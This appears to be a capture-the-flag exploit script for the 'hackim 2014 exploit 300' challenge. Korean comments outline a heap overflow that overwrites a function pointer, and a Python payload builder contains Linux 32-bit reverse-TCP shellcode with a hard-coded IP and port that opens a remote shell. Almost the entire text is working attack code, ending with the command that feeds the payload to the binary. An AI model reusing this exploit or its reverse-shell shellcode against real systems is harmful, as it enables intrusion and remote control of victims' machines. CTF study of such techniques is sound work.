[exploit] hackim 2014 exploit 300

# 1. malloc(0x100)과 malloc(0)을 생성. # 2. malloc(0)의 size는 stage2에서 버퍼를 채움으로써 변경가능 # 3. strcpy(0x100, 0x110)으로 Heap Overflow 발생 # 4. [Heeeeeeeeaaaaaaaaaaapppp][Function1][Function2] 힙을 채움으로써 function1을 덮을수 있음 # 5. function1은 [pop ret]로 덮음 # 6. 그 후 stage 4 코드대로 쉘코드 실행 import struct p = lambda x: struct.pack("<I", x) #linux 32bit reverse_tcp shellcode = "\x68" shellcode+= "\x70\xa2\x1d\x06" # <- IP Number shellcode+= "\x5e\x66\x68" shellcode+= "\xd9\x03" # <- Port Number "55555" shellcode+= "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02" shellcode+= "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79" shellcode+= "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a" shellcode+= "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f" shellcode+= "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" shellcode+= "\xeb\xce" pr = 0x80483ac ##### stage 1 ######### payload = 'a' * 0x28 payload += p(0x64) payload += '\n' #### stage 2 ######### #### strcpy(v6, v8) // over flow payload += 'b' * 0x28 payload += p(0xc8) payload += 'c'* 0x24 payload += p(0x110) # 0x804b120, malloc size payload += '\n' payload += 'd' * (0x110 - 4 -4) # ['a'*0x108][func(1)][func(2)] payload += p(pr) # func(1) over write payload += '\n' #### stage 3 ########## payload += 'a' * 0x28 payload += p(0x12c) payload += '\n' ### stage 4 ##### payload += '\xeb\x50' # jmp short payload += 'b' * 0x26 payload += p(0x32) payload += '\x90' * 0x50 payload += shellcode payload += '\n' f = open("vuln3.txt", "wb") f.write(payload) f.close() ''' $ (cat vuln3.txt)|./vuln3 '''